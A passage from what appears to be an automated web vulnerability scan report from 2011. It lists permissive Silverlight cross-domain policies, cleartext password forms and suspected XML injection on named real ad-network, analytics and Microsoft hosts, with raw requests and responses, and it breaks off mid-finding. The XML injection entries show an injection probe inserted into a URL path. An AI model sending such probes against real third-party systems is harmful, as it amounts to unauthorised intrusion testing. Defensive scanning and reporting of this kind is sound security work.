The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.7. http://dp.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dp.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:51 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:56:36 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.8. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:24 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:31:29 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.9. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 02:38:59 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 02:38:59 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

8.10. http://plg3.yumenetworks.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://plg3.yumenetworks.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: plg3.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:50 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT
ETag: "169c460-135-49ebc23880680"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

8.11. http://premiumtv.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:22:19 GMT
Server: Omniture DC/2.0.0
xserver: www328
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.12. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:13:25 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 8424
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.13. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-uk.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-uk.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 02:38:54 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 02:38:54 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

8.14. http://shadow01.yumenetworks.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shadow01.yumenetworks.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: shadow01.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:05:07 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Fri, 18 Mar 2011 20:57:11 GMT
ETag: "12ab3f0-135-49ec80592d7c0"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://qa-web-001.sjc1.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Access-Control-Allow-Origin: *
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...

8.15. http://t4.liverail.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t4.liverail.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: t4.liverail.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
ETag: "89003753"
Last-Modified: Mon, 22 Aug 2011 16:57:51 GMT
Content-Length: 321
Date: Sun, 04 Sep 2011 03:20:41 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

8.16. http://netspiderads3.indiatimes.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://netspiderads3.indiatimes.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: netspiderads3.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31104000
Content-Length: 778
Content-Type: text/xml
Last-Modified: Tue, 01 Dec 2009 13:53:05 GMT
Accept-Ranges: bytes
ETag: "f1878d9b8d72ca1:405"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:35:23 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.indiatimes.com"/>
</a
...[SNIP]...
<domain uri="122.166.10.43" />
...[SNIP]...
<domain uri="http://121.243.172.93" />
...[SNIP]...

8.17. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 04 Sep 2011 03:38:05 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8.18. http://ts2.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts2.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 04 Sep 2011 03:37:33 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8.19. http://ts3.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts3.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts3.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 04 Sep 2011 03:37:45 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8.20. http://ts4.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts4.mm.bing.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts4.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Sun, 04 Sep 2011 03:38:00 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>
<!-- FD -->
<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8.21. http://adscontent2.indiatimes.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adscontent2.indiatimes.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: adscontent2.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 580
Content-Type: text/xml
Last-Modified: Thu, 15 Oct 2009 04:43:10 GMT
Accept-Ranges: bytes
ETag: "68f9bff514dca1:4c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=31104000
Date: Sun, 04 Sep 2011 02:30:31 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://121.243.172.93"/>
</all
...[SNIP]...
<domain uri="122.166.10.43" />
...[SNIP]...

8.22. http://choice.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.atdmt.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:24:48 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...

8.23. http://choice.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:26:28 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...

8.24. http://choice.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: choice.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 10:30:16 GMT
Accept-Ranges: bytes
ETag: "06c2d547f56cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:04:33 GMT
Connection: close
Content-Length: 416

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://choice.live.com"/>
<domain uri="https://choice.live.com"/>
...[SNIP]...

8.25. http://netspiderads2.indiatimes.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: netspiderads2.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31104000
Content-Length: 580
Content-Type: text/xml
Last-Modified: Thu, 15 Oct 2009 04:43:10 GMT
Accept-Ranges: bytes
ETag: "68f9bff514dca1:4a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:30:27 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://121.243.172.93"/>
</all
...[SNIP]...
<domain uri="122.166.10.43" />
...[SNIP]...

8.26. http://profile.live.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 1f941fec-efc1-40e2-a929-438ba10670b8
Set-Cookie: E=P:/tj/ytA4zog=:ZqtwfgzZDoE0r1I3P9gmh1biqQmPx/I3eYgRy0I/2Xo=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:/tj/ytA4zog=:ZqtwfgzZDoE0r1I3P9gmh1biqQmPx/I3eYgRy0I/2Xo=:F; domain=.live.com; path=/
Set-Cookie: xidseq=4; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sun, 04-Sep-2011 02:38:11 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sun, 11-Sep-2011 04:18:11 GMT; path=/
Set-Cookie: sc_clustbl_142=ac237f23bf0e639e; domain=profile.live.com; expires=Tue, 04-Oct-2011 04:18:11 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BAYXXXXXC525 V: 1 D: 8/14/2011
Date: Sun, 04 Sep 2011 04:18:11 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

9. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


9.1. http://member.bangkokpost.com/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.bangkokpost.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.php HTTP/1.1
Host: member.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:28:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post -
...[SNIP]...
</h2>
   <FORM id="xForm" name="xForm" action="../member_process.php" method="POST">
   <input type="hidden" id="xserviceID" name="xserviceID" value="10006">
...[SNIP]...
</label>
                           <input type="password" name="xPassword" id="xPassword" class="textfield" value=""/>
                           <span class="form-message">
...[SNIP]...

9.2. http://ndtvjobs.bixee.com/search/search/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndtvjobs.bixee.com
Path:   /search/search/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /search/search/ HTTP/1.1
Host: ndtvjobs.bixee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:57 GMT
Server: ibibo-WS
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="guestLeftNdtv" style="float:left">
           <form method="post" action="/job-seeker/submit_login/" onsubmit="return verifyLogin();">
<span class="welcomeGuestNdtv">
...[SNIP]...
<div class="passwordInput"><input type="password" onfocus="if (this.value == 'Password') {this.value = '';this.style.color = '#333';}else{this.style.color = '#333';}" onblur="if (this.value == '') {this.value = 'Password';this.style.color = '#c9c9c9';}" class="inputHomeNdtv" id="loginPassword" name="password" style = "color:#c9c9c9;" value="Password"/></div>
...[SNIP]...

9.3. http://truehits.net/stat.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /stat.php HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:21:20 GMT
Server: Apache
Content-Length: 38194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<td>
<form name="login" method="post" action="http://truehits.net/ch_pass.php">
<table width="130" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td style = "padding: 3px 3px 0px 3px">
<input name="passwd" type="password" class="inputtext" size="15" maxlength="20" />
</td>
...[SNIP]...

10. XML injection  previous  next
There are 73 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


10.1. http://ad4.liverail.com/util/companions.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ad4.liverail.com
Path:   /util/companions.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /util]]>>/companions.php HTTP/1.1
Host: ad4.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Sun, 04 Sep 2011 04:06:37 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.2. http://ad4.liverail.com/util/companions.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ad4.liverail.com
Path:   /util/companions.php

Issue detail

